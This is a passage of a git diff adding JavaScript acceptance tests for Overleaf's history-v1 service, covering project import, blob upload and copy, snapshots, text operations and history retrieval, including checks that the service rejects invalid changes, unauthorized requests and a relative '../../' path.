}) + ), + ], + new Date() + ) + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: projectId, + changes: [change.toRaw()], + end_version: 2, + return_snapshot: 'hashed', + }).then(response => { + expect(response.status).to.equal(HTTPStatus.CREATED) + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(3) + expect(snapshot.getFile('graph_1.png').getHash()).to.equal( + testFiles.GRAPH_PNG_HASH + ) + expect(snapshot.getFile('graph_2.png').getHash()).to.equal( + testFiles.GRAPH_PNG_HASH + ) + expect(snapshot.getFile('main.tex').getHash()).to.equal( + blobHash.fromString('hello') + ) + return projectId + }) + }) + + // get the new project state + .then(projectId => { + return client.apis.Project.getLatestContent({ + project_id: projectId, + }).then(response => { + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(3) + expect(snapshot.getFile('graph_1.png').getHash()).to.equal( + testFiles.GRAPH_PNG_HASH + ) + expect(snapshot.getFile('graph_2.png').getHash()).to.equal( + testFiles.GRAPH_PNG_HASH + ) + const mainFile = snapshot.getFile('main.tex') + expect(mainFile.getHash()).to.be.null + expect(mainFile.getContent()).to.equal('hello') + return projectId + }) + }) + + // edit the main file again + .then(projectId => { + const change = new Change( + [ + Operation.editFile( + 'main.tex', + TextOperation.fromJSON({ textOperation: [1, -4, 'i world'] }) + ), + ], + new Date() + ) + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: projectId, + changes: [change.toRaw()], + end_version: 3, + return_snapshot: 'hashed', + }).then(response => { + expect(response.status).to.equal(HTTPStatus.CREATED) + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(3) + expect(snapshot.getFile('main.tex').getHash()).to.equal( + blobHash.fromString('hi world') + ) + return projectId 
+ }) + }) + + // get the new project state + .then(projectId => { + return client.apis.Project.getLatestContent({ + project_id: projectId, + }).then(response => { + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(3) + expect(snapshot.getFile('graph_1.png')).to.exist + expect(snapshot.getFile('graph_2.png')).to.exist + const mainFile = snapshot.getFile('main.tex') + expect(mainFile.getHash()).to.be.null + expect(mainFile.getContent()).to.equal('hi world') + return projectId + }) + }) + + // rename the text file + .then(projectId => { + const change = new Change( + [Operation.moveFile('main.tex', 'intro.tex')], + new Date() + ) + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: projectId, + changes: [change.toRaw()], + end_version: 4, + return_snapshot: 'hashed', + }).then(response => { + expect(response.status).to.equal(HTTPStatus.CREATED) + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(3) + expect(snapshot.getFile('intro.tex').getHash()).to.equal( + blobHash.fromString('hi world') + ) + return projectId + }) + }) + + // get the new project state + .then(projectId => { + return client.apis.Project.getLatestContent({ + project_id: projectId, + }).then(response => { + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(3) + expect(snapshot.getFile('graph_1.png')).to.exist + expect(snapshot.getFile('graph_2.png')).to.exist + const mainFile = snapshot.getFile('intro.tex') + expect(mainFile.getHash()).to.be.null + expect(mainFile.getContent()).to.equal('hi world') + return projectId + }) + }) + + // remove a graph + .then(projectId => { + const change = new Change( + [Operation.removeFile('graph_1.png')], + new Date() + ) + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: projectId, + changes: [change.toRaw()], + end_version: 5, + return_snapshot: 'hashed', + }).then(response => { + expect(response.status).to.equal(HTTPStatus.CREATED) + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(2) + return projectId + }) + }) + + // get the new project state + .then(projectId => { + return client.apis.Project.getLatestContent({ + project_id: projectId, + }).then(response => { + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(2) + expect(snapshot.getFile('graph_2.png')).to.exist + const mainFile = snapshot.getFile('intro.tex') + expect(mainFile.getHash()).to.be.null + expect(mainFile.getContent()).to.equal('hi world') + return projectId + }) + }) + + // download zip with project content + .then(projectId => { + return downloadZipClient.apis.Project.getZip({ + project_id: projectId, + version: 6, + }).then(response => { + expect(response.status).to.equal(HTTPStatus.OK) + const headers = response.headers + expect(headers['content-type']).to.equal('application/octet-stream') + expect(headers['content-disposition']).to.equal( + 'attachment; filename=project.zip' + ) + }) + }) + ) + }) +}) diff --git a/services/history-v1/test/acceptance/js/api/project_blobs.test.js b/services/history-v1/test/acceptance/js/api/project_blobs.test.js new file mode 100644 index 0000000..f2677e4 --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/project_blobs.test.js @@ -0,0 +1,251 @@ +const { expect } = require('chai') +const config = require('config') +const fs = require('node:fs') +const fetch = require('node-fetch') +const HTTPStatus = require('http-status') + +const 
cleanup = require('../storage/support/cleanup') +const fixtures = require('../storage/support/fixtures') +const testFiles = require('../storage/support/test_files') +const testServer = require('./support/test_server') +const { expectHttpError } = require('./support/expect_response') + +const { globalBlobs } = require('../../../../storage/lib/mongodb.js') +const { + loadGlobalBlobs, +} = require('../../../../storage/lib/blob_store/index.js') + +describe('Project blobs API', function () { + const projectId = '123' + + beforeEach(cleanup.everything) + beforeEach(fixtures.create) + + let client + let token + before(async function () { + client = await testServer.createClientForProject(projectId) + token = testServer.createTokenForProject(projectId) + }) + + it('returns 404 if the blob is not found', async function () { + const testHash = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' + await expectHttpError( + client.apis.Project.getProjectBlob({ + project_id: projectId, + hash: testHash, + }), + HTTPStatus.NOT_FOUND + ) + }) + + it('checks if file hash matches the hash parameter', async function () { + const testHash = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' + const response = await fetch( + testServer.url(`/api/projects/${projectId}/blobs/${testHash}`), + { + method: 'PUT', + headers: { Authorization: `Bearer ${token}` }, + body: fs.createReadStream(testFiles.path('hello.txt')), + } + ) + expect(response.status).to.equal(HTTPStatus.CONFLICT) + + // check that it did not store the file + await expectHttpError( + client.apis.Project.getProjectBlob({ + project_id: projectId, + hash: testFiles.HELLO_TXT_HASH, + }), + HTTPStatus.NOT_FOUND + ) + }) + + it('rejects oversized files', async function () { + const testHash = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' + const buffer = Buffer.alloc( + parseInt(config.get('maxFileUploadSize'), 10) + 1 + ) + const response = await fetch( + testServer.url(`/api/projects/${projectId}/blobs/${testHash}`), + { + method: 'PUT', + headers: { Authorization: `Bearer ${token}` }, + body: buffer, + } + ) + expect(response.status).to.equal(HTTPStatus.REQUEST_ENTITY_TOO_LARGE) + }) + + describe('with an existing blob', async function () { + let fileContents + + beforeEach(async function () { + fileContents = await fs.promises.readFile(testFiles.path('hello.txt')) + const response = await fetch( + testServer.url( + `/api/projects/${projectId}/blobs/${testFiles.HELLO_TXT_HASH}` + ), + { + method: 'PUT', + headers: { Authorization: `Bearer ${token}` }, + body: fileContents, + } + ) + expect(response.ok).to.be.true + }) + + it('fulfills a request with a JWT header', async function () { + const response = await client.apis.Project.getProjectBlob({ + project_id: projectId, + hash: testFiles.HELLO_TXT_HASH, + }) + const responseText = await response.data.text() + expect(responseText).to.equal(fileContents.toString()) + }) + + it('fulfills a request with a token parameter', async function () { + const url = new URL( + testServer.url( + `/api/projects/${projectId}/blobs/${testFiles.HELLO_TXT_HASH}` + ) + ) + url.searchParams.append('token', token) + const response = await fetch(url) + const payload = await response.text() + expect(payload).to.equal(fileContents.toString()) + }) + + it('supports range request', async function () { + const url = new URL( + testServer.url( + `/api/projects/${projectId}/blobs/${testFiles.HELLO_TXT_HASH}` + ) + ) + url.searchParams.append('token', token) + const response = await fetch(url, { headers: { Range: 'bytes=0-4' } }) + const payload = await 
response.text() + expect(payload).to.equal(fileContents.toString().slice(0, 4)) + }) + + it('supports HEAD request', async function () { + const url = new URL( + testServer.url( + `/api/projects/${projectId}/blobs/${testFiles.HELLO_TXT_HASH}` + ) + ) + url.searchParams.append('token', token) + const response = await fetch(url, { method: 'HEAD' }) + expect(response.headers.get('Content-Length')).to.equal( + testFiles.HELLO_TXT_BYTE_LENGTH.toString() + ) + const payload = await response.text() + expect(payload).to.have.length(0) + }) + + it('rejects an unauthorized request', async function () { + const response = await fetch( + testServer.url( + `/api/projects/${projectId}/blobs/${testFiles.HELLO_TXT_HASH}` + ) + ) + expect(response.status).to.equal(HTTPStatus.UNAUTHORIZED) + }) + + it('copies the blob to another project', async function () { + const targetProjectId = '456' + const targetClient = + await testServer.createClientForProject(targetProjectId) + const targetToken = testServer.createTokenForProject(targetProjectId) + const url = new URL( + testServer.url( + `/api/projects/${targetProjectId}/blobs/${testFiles.HELLO_TXT_HASH}` + ) + ) + url.searchParams.append('copyFrom', projectId) + + const response = await fetch(url, { + method: 'POST', + headers: { Authorization: `Bearer ${targetToken}` }, + }) + expect(response.status).to.equal(HTTPStatus.CREATED) + + const newBlobResponse = await targetClient.apis.Project.getProjectBlob({ + project_id: targetProjectId, + hash: testFiles.HELLO_TXT_HASH, + }) + const newBlobResponseText = await newBlobResponse.data.text() + expect(newBlobResponseText).to.equal(fileContents.toString()) + }) + + it('skips copying a blob to another project if it already exists', async function () { + const targetProjectId = '456' + const targetClient = + await testServer.createClientForProject(targetProjectId) + const targetToken = testServer.createTokenForProject(targetProjectId) + + const fileContents = await fs.promises.readFile( + testFiles.path('hello.txt') + ) + const uploadResponse = await fetch( + testServer.url( + `/api/projects/${targetProjectId}/blobs/${testFiles.HELLO_TXT_HASH}` + ), + { + method: 'PUT', + headers: { Authorization: `Bearer ${targetToken}` }, + body: fileContents, + } + ) + expect(uploadResponse.ok).to.be.true + + const url = new URL( + testServer.url( + `/api/projects/${targetProjectId}/blobs/${testFiles.HELLO_TXT_HASH}` + ) + ) + url.searchParams.append('copyFrom', projectId) + + const response = await fetch(url, { + method: 'POST', + headers: { Authorization: `Bearer ${targetToken}` }, + }) + expect(response.status).to.equal(HTTPStatus.NO_CONTENT) + + const newBlobResponse = await targetClient.apis.Project.getProjectBlob({ + project_id: targetProjectId, + hash: testFiles.HELLO_TXT_HASH, + }) + const newBlobResponseText = await newBlobResponse.data.text() + expect(newBlobResponseText).to.equal(fileContents.toString()) + }) + }) + + describe('with a global blob', async function () { + before(async function () { + await globalBlobs.insertOne({ + _id: testFiles.STRING_A_HASH, + byteLength: 1, + stringLength: 1, + }) + await loadGlobalBlobs() + }) + + it('does not copy global blobs', async function () { + const targetProjectId = '456' + const targetToken = testServer.createTokenForProject(targetProjectId) + const url = new URL( + testServer.url( + `/api/projects/${targetProjectId}/blobs/${testFiles.STRING_A_HASH}` + ) + ) + url.searchParams.append('copyFrom', projectId) + + const response = await fetch(url, { + method: 'POST', + headers: { 
Authorization: `Bearer ${targetToken}` }, + }) + expect(response.status).to.equal(HTTPStatus.NO_CONTENT) + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/api/project_import.test.js b/services/history-v1/test/acceptance/js/api/project_import.test.js new file mode 100644 index 0000000..216fb52 --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/project_import.test.js @@ -0,0 +1,57 @@ +'use strict' + +const BPromise = require('bluebird') +const { expect } = require('chai') +const HTTPStatus = require('http-status') +const fetch = require('node-fetch') +const fs = BPromise.promisifyAll(require('node:fs')) + +const cleanup = require('../storage/support/cleanup') +const fixtures = require('../storage/support/fixtures') +const testFiles = require('../storage/support/test_files') +const testProjects = require('./support/test_projects') +const testServer = require('./support/test_server') + +const { Change, File, Operation } = require('overleaf-editor-core') + +describe('project import', function () { + beforeEach(cleanup.everything) + beforeEach(fixtures.create) + + it('skips generating the snapshot by default', async function () { + const basicAuthClient = testServer.basicAuthClient + const projectId = await testProjects.createEmptyProject() + + // upload an empty file + const response = await fetch( + testServer.url( + `/api/projects/${projectId}/blobs/${File.EMPTY_FILE_HASH}`, + { qs: { pathname: 'main.tex' } } + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('empty.tex')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + expect(response.ok).to.be.true + + const testFile = File.fromHash(File.EMPTY_FILE_HASH) + const testChange = new Change( + [Operation.addFile('main.tex', testFile)], + new Date() + ) + + const importResponse = + await basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: projectId, + end_version: 0, + changes: [testChange.toRaw()], + }) + + expect(importResponse.status).to.equal(HTTPStatus.CREATED) + expect(importResponse.obj).to.deep.equal({}) + }) +}) diff --git a/services/history-v1/test/acceptance/js/api/project_updates.test.js b/services/history-v1/test/acceptance/js/api/project_updates.test.js new file mode 100644 index 0000000..d670002 --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/project_updates.test.js @@ -0,0 +1,853 @@ +const BPromise = require('bluebird') +const { expect } = require('chai') +const fs = BPromise.promisifyAll(require('node:fs')) +const HTTPStatus = require('http-status') +const fetch = require('node-fetch') + +const cleanup = require('../storage/support/cleanup') +const fixtures = require('../storage/support/fixtures') +const testFiles = require('../storage/support/test_files') +const expectResponse = require('./support/expect_response') +const testServer = require('./support/test_server') + +const core = require('overleaf-editor-core') +const testProjects = require('./support/test_projects') +const Change = core.Change +const ChunkResponse = core.ChunkResponse +const File = core.File +const Operation = core.Operation +const Origin = core.Origin +const Snapshot = core.Snapshot +const TextOperation = core.TextOperation +const V2DocVersions = core.V2DocVersions + +const knex = require('../../../../storage').knex + +describe('history import', function () { + beforeEach(cleanup.everything) + beforeEach(fixtures.create) + + function changeToRaw(change) { + return change.toRaw() + } + + function makeChange(operation) { + return new Change([operation], new 
Date(), []) + } + + let basicAuthClient + let pseudoJwtBasicAuthClient + let clientForProject + + before(async function () { + basicAuthClient = testServer.basicAuthClient + pseudoJwtBasicAuthClient = testServer.pseudoJwtBasicAuthClient + clientForProject = await testServer.createClientForProject('1') + }) + + it('creates blobs and then imports a snapshot and history', function () { + // We need to be able to set the projectId to match an existing doc ID. + const testProjectId = '1' + const testFilePathname = 'main.tex' + const testAuthors = [123, null] + const testTextOperation0 = TextOperation.fromJSON({ textOperation: ['a'] }) + const testTextOperation1 = TextOperation.fromJSON({ + textOperation: [1, 'b'], + }) + + let testSnapshot + + return fetch( + testServer.url( + `/api/projects/${testProjectId}/blobs/${File.EMPTY_FILE_HASH}` + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('empty.tex')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + .then(response => { + expect(response.ok).to.be.true + }) + .then(() => { + // Import project + testSnapshot = new Snapshot() + testSnapshot.addFile( + testFilePathname, + File.fromHash(File.EMPTY_FILE_HASH) + ) + return basicAuthClient.apis.ProjectImport.importSnapshot1({ + project_id: testProjectId, + snapshot: testSnapshot.toRaw(), + }) + }) + .then(response => { + // Check project is valid + expect(response.obj.projectId).to.equal(testProjectId) + }) + .then(() => { + // Try importing the project again + return basicAuthClient.apis.ProjectImport.importSnapshot1({ + project_id: testProjectId, + snapshot: testSnapshot.toRaw(), + }) + }) + .then(() => { + // Check that importing a duplicate fails + expect.fail() + }) + .catch(expectResponse.conflict) + .then(() => { + // Get project history + return clientForProject.apis.Project.getLatestHistory({ + project_id: testProjectId, + }) + }) + .then(response => { + // Check that the imported history is valid + const chunk = ChunkResponse.fromRaw(response.obj).getChunk() + const snapshot = chunk.getSnapshot() + expect(snapshot.countFiles()).to.equal(1) + const file = snapshot.getFile(testFilePathname) + expect(file.getHash()).to.eql(File.EMPTY_FILE_HASH) + expect(chunk.getChanges().length).to.equal(0) + expect(chunk.getEndVersion()).to.equal(0) + }) + .then(() => { + // Import changes with an end version + const changes = [ + makeChange(Operation.editFile(testFilePathname, testTextOperation0)), + makeChange(Operation.editFile(testFilePathname, testTextOperation1)), + ] + changes[0].setAuthors(testAuthors) + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + changes: changes.map(changeToRaw), + end_version: 0, + return_snapshot: 'hashed', + }) + }) + .then(response => { + expect(response.status).to.equal(HTTPStatus.CREATED) + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(1) + expect(snapshot.getFile('main.tex').getHash()).to.equal( + testFiles.STRING_AB_HASH + ) + }) + + .then(() => { + // Get project history + return clientForProject.apis.Project.getLatestHistory({ + project_id: testProjectId, + }) + }) + .then(response => { + // Check that the history is valid + const chunkResponse = ChunkResponse.fromRaw(response.obj) + const chunk = chunkResponse.getChunk() + const snapshot = chunk.getSnapshot() + expect(snapshot.countFiles()).to.equal(1) + const file = snapshot.getFile(testFilePathname) + expect(file.getHash()).to.equal(File.EMPTY_FILE_HASH) + 
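+ // Both imported changes are returned, and the v1 author ids set via + // setAuthors() are preserved on the first change.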
expect(chunk.getChanges().length).to.equal(2) + const changeWithAuthors = chunk.getChanges()[0] + expect(changeWithAuthors.getAuthors().length).to.equal(2) + expect(changeWithAuthors.getAuthors()).to.deep.equal(testAuthors) + expect(chunk.getStartVersion()).to.equal(0) + expect(chunk.getEndVersion()).to.equal(2) + }) + .then(() => { + return clientForProject.apis.Project.getLatestHistory({ + project_id: testProjectId, + }) + }) + .then(response => { + // it should retrieve the same chunk + const chunkResponse = ChunkResponse.fromRaw(response.obj) + const chunk = chunkResponse.getChunk() + expect(chunk.getChanges().length).to.equal(2) + expect(chunk.getStartVersion()).to.equal(0) + expect(chunk.getEndVersion()).to.equal(2) + }) + .then(() => { + // Get project's latest content + return clientForProject.apis.Project.getLatestContent({ + project_id: testProjectId, + }) + }) + .then(response => { + // Check that the content is valid + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(1) + const file = snapshot.getFile(testFilePathname) + expect(file.getContent()).to.equal('ab') + }) + }) + + it('rejects invalid changes in history', function () { + const testProjectId = '1' + const testFilePathname = 'main.tex' + const testTextOperation = TextOperation.fromJSON({ + textOperation: ['a', 10], + }) + + let testSnapshot + + return fetch( + testServer.url( + `/api/projects/${testProjectId}/blobs/${File.EMPTY_FILE_HASH}` + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('empty.tex')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + .then(response => { + expect(response.ok).to.be.true + }) + .then(() => { + // Import project + testSnapshot = new Snapshot() + testSnapshot.addFile( + testFilePathname, + File.fromHash(File.EMPTY_FILE_HASH) + ) + return basicAuthClient.apis.ProjectImport.importSnapshot1({ + project_id: testProjectId, + snapshot: testSnapshot.toRaw(), + }) + }) + .then(response => { + // Check project is valid + expect(response.obj.projectId).to.equal(testProjectId) + }) + .then(() => { + // Import invalid changes + const changes = [ + makeChange(Operation.editFile(testFilePathname, testTextOperation)), + ] + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 0, + return_snapshot: 'hashed', + changes: changes.map(changeToRaw), + }) + }) + .then(() => { + // Check that this fails + expect.fail() + }) + .catch(expectResponse.unprocessableEntity) + .then(() => { + // Get the latest content + return clientForProject.apis.Project.getLatestContent({ + project_id: testProjectId, + }) + }) + .then(response => { + // Check that no changes have been stored + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(1) + const file = snapshot.getFile(testFilePathname) + expect(file.getContent()).to.equal('') + }) + .then(() => { + // Send a change with the wrong end version that is not conflicting + // with the latest snapshot + const changes = [makeChange(Operation.removeFile(testFilePathname))] + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 10000, + changes, + }) + }) + .then(() => { + // Check that this fails + expect.fail() + }) + .catch(expectResponse.unprocessableEntity) + .then(() => { + // Get the latest project history + return clientForProject.apis.Project.getLatestHistory({ + project_id: testProjectId, + }) + }) + .then(response => { + // Check that no changes have been 
stored + const chunkResponse = ChunkResponse.fromRaw(response.obj) + const changes = chunkResponse.getChunk().getChanges() + expect(changes).to.have.length(0) + }) + }) + + it('creates and edits a file using changes', function () { + const testProjectId = '1' + const mainFilePathname = 'main.tex' + const testFilePathname = 'test.tex' + const testTextOperation = TextOperation.fromJSON({ textOperation: ['a'] }) + const inexistentAuthors = [1234, 5678] + const projectVersion = '12345.0' + const v2DocVersions = new V2DocVersions({ + 'random-doc-id': { pathname: 'doc-path.tex', v: 123 }, + }) + const testLabelOrigin = Origin.fromRaw({ + kind: 'saved ver', + }) + const testRestoreOrigin = Origin.fromRaw({ + kind: 'restore', + timestamp: '2016-01-01T00:00:00', + version: 1, + }) + + let testSnapshot + + return fetch( + testServer.url( + `/api/projects/${testProjectId}/blobs/${File.EMPTY_FILE_HASH}` + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('empty.tex')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + .then(response => { + expect(response.ok).to.be.true + }) + .then(() => { + // Import a project + testSnapshot = new Snapshot() + testSnapshot.addFile( + mainFilePathname, + File.fromHash(File.EMPTY_FILE_HASH) + ) + return basicAuthClient.apis.ProjectImport.importSnapshot1({ + project_id: testProjectId, + snapshot: testSnapshot.toRaw(), + }) + }) + .then(response => { + // Check that the project is valid + expect(response.obj.projectId).to.equal(testProjectId) + }) + .then(() => { + // Import changes + const testFile = File.fromHash(File.EMPTY_FILE_HASH) + const changes = [ + makeChange(Operation.addFile(testFilePathname, testFile)), + makeChange(Operation.editFile(testFilePathname, testTextOperation)), + ] + changes[0].setProjectVersion(projectVersion) + changes[1].setAuthors(inexistentAuthors) + changes[1].setV2DocVersions(v2DocVersions) + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 0, + return_snapshot: 'hashed', + changes: changes.map(changeToRaw), + }) + }) + .then(response => { + expect(response.status).to.equal(HTTPStatus.CREATED) + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(2) + expect(snapshot.getFile('main.tex').getHash()).to.equal( + File.EMPTY_FILE_HASH + ) + expect(snapshot.getFile('test.tex').getHash()).to.equal( + testFiles.STRING_A_HASH + ) + }) + .then(() => { + // Get the project history + return clientForProject.apis.Project.getLatestHistory({ + project_id: testProjectId, + }) + }) + .then(response => { + // it should not fail when some of the authors do not exist anymore + const chunkResponse = ChunkResponse.fromRaw(response.obj) + const changes = chunkResponse.getChunk().getChanges() + expect(changes.length).to.equal(2) + const changeWithAuthor = changes[1] + expect(changeWithAuthor.getAuthors()).to.deep.equal(inexistentAuthors) + }) + .then(() => { + // it should retrieve the latest snapshot when the change set is empty + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 0, + return_snapshot: 'hashed', + changes: [], + }) + }) + .then(response => { + // Check latest snapshot + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(2) + expect(snapshot.getFile('main.tex').getHash()).to.equal( + File.EMPTY_FILE_HASH + ) + expect(snapshot.getFile('test.tex').getHash()).to.equal( + testFiles.STRING_A_HASH + ) + 
expect(snapshot.getProjectVersion()).to.equal(projectVersion) + expect(snapshot.getV2DocVersions()).to.deep.equal(v2DocVersions) + }) + .then(() => { + // Import changes with origin + const testFile = File.fromHash(File.EMPTY_FILE_HASH) + const changes = [ + makeChange(Operation.removeFile(testFilePathname)), + makeChange(Operation.addFile(testFilePathname, testFile)), + ] + changes[0].setOrigin(testLabelOrigin) + changes[1].setOrigin(testRestoreOrigin) + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 0, + changes: changes.map(changeToRaw), + }) + }) + .then(() => { + // Get the latest history + return clientForProject.apis.Project.getLatestHistory({ + project_id: testProjectId, + }) + }) + .then(response => { + // Check that the origin is stored + const chunkResponse = ChunkResponse.fromRaw(response.obj) + const changes = chunkResponse.getChunk().getChanges() + expect(changes).to.have.length(4) + expect(changes[2].getOrigin()).to.deep.equal(testLabelOrigin) + expect(changes[3].getOrigin()).to.deep.equal(testRestoreOrigin) + }) + .then(() => { + // Import invalid changes + const testFile = File.fromHash(File.EMPTY_FILE_HASH) + const changes = [makeChange(Operation.addFile('../../a.tex', testFile))] + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 0, + changes: changes.map(changeToRaw), + }) + }) + .then(() => { + // Check that this fails and returns a 422 + expect.fail() + }) + .catch(expectResponse.unprocessableEntity) + }) + + it('rejects text operations on binary files', function () { + const testProjectId = '1' + const testFilePathname = 'main.tex' + const testTextOperation = TextOperation.fromJSON({ textOperation: ['bb'] }) + + let testSnapshot + + return fetch( + testServer.url( + `/api/projects/${testProjectId}/blobs/${testFiles.NON_BMP_TXT_HASH}` + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('non_bmp.txt')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + .then(response => { + expect(response.ok).to.be.true + }) + .then(() => { + // Import a project + testSnapshot = new Snapshot() + testSnapshot.addFile( + testFilePathname, + File.fromHash(testFiles.NON_BMP_TXT_HASH) + ) + return basicAuthClient.apis.ProjectImport.importSnapshot1({ + project_id: testProjectId, + snapshot: testSnapshot.toRaw(), + }) + }) + .then(response => { + // Check that the project is valid + expect(response.obj.projectId).to.equal(testProjectId) + }) + .then(() => { + // Import invalid changes + const changes = [ + makeChange(Operation.editFile(testFilePathname, testTextOperation)), + ] + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 0, + changes: changes.map(changeToRaw), + }) + }) + .then(() => { + // Expect invalid changes to fail + expect.fail() + }) + .catch(expectResponse.unprocessableEntity) + .then(() => { + // Get latest content + return clientForProject.apis.Project.getLatestContent({ + project_id: testProjectId, + }) + }) + .then(response => { + // Check that no changes were stored + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(1) + expect(snapshot.getFile(testFilePathname).getHash()).to.equal( + testFiles.NON_BMP_TXT_HASH + ) + }) + }) + + it('accepts text operation on files with null characters if stringLength is present', function () { + const testProjectId = '1' + const mainFilePathname = 'main.tex' + const testTextOperation = 
TextOperation.fromJSON({ + textOperation: [3, 'a'], + }) + + let testSnapshot + + function importChanges() { + const changes = [ + makeChange(Operation.editFile(mainFilePathname, testTextOperation)), + ] + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 0, + changes: changes.map(changeToRaw), + }) + } + + function getLatestContent() { + return clientForProject.apis.Project.getLatestContent({ + project_id: testProjectId, + }) + } + + return fetch( + testServer.url( + `/api/projects/${testProjectId}/blobs/${testFiles.NULL_CHARACTERS_TXT_HASH}` + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('null_characters.txt')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + .then(response => { + expect(response.ok).to.be.true + }) + .then(() => { + // Import project + testSnapshot = new Snapshot() + testSnapshot.addFile( + mainFilePathname, + File.fromHash(testFiles.NULL_CHARACTERS_TXT_HASH) + ) + return basicAuthClient.apis.ProjectImport.importSnapshot1({ + project_id: testProjectId, + snapshot: testSnapshot.toRaw(), + }) + }) + .then(importChanges) + .then(() => { + // Expect invalid changes to fail + expect.fail() + }) + .catch(expectResponse.unprocessableEntity) + .then(getLatestContent) + .then(response => { + // Check that no changes were made + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(1) + expect(snapshot.getFile(mainFilePathname).getHash()).to.equal( + testFiles.NULL_CHARACTERS_TXT_HASH + ) + }) + .then(() => { + // Set string length + return knex('project_blobs').update( + 'string_length', + testFiles.NULL_CHARACTERS_TXT_BYTE_LENGTH + ) + }) + .then(importChanges) + .then(getLatestContent) + .then(response => { + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(1) + expect(snapshot.getFile(mainFilePathname).getContent()).to.equal( + '\x00\x00\x00a' + ) + }) + }) + + it('returns 404 when chunk is not found in bucket', function () { + const testProjectId = '1' + const fooChange = makeChange(Operation.removeFile('foo.tex')) + + return knex('chunks') + .insert({ + doc_id: testProjectId, + start_version: 0, + end_version: 100, + end_timestamp: null, + }) + .then(() => { + // Import changes + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 100, + changes: [fooChange.toRaw()], + }) + }) + .then(() => { + // Expect invalid changes to fail + expect.fail() + }) + .catch(expectResponse.notFound) + }) + + it('creates and returns changes with v2 author ids', function () { + const testFilePathname = 'test.tex' + const testTextOperation = TextOperation.fromJSON({ textOperation: ['a'] }) + const v2Authors = ['5a296963ad5e82432674c839', null] + + let testProjectId + + return testProjects + .createEmptyProject() + .then(projectId => { + testProjectId = projectId + expect(testProjectId).to.be.a('string') + }) + .then(() => { + return fetch( + testServer.url( + `/api/projects/${testProjectId}/blobs/${File.EMPTY_FILE_HASH}` + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('empty.tex')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + }) + .then(response => { + expect(response.ok).to.be.true + }) + .then(() => { + // Import changes + const testFile = File.fromHash(File.EMPTY_FILE_HASH) + const changes = [ + makeChange(Operation.addFile(testFilePathname, testFile)), + makeChange(Operation.editFile(testFilePathname, testTextOperation)), 
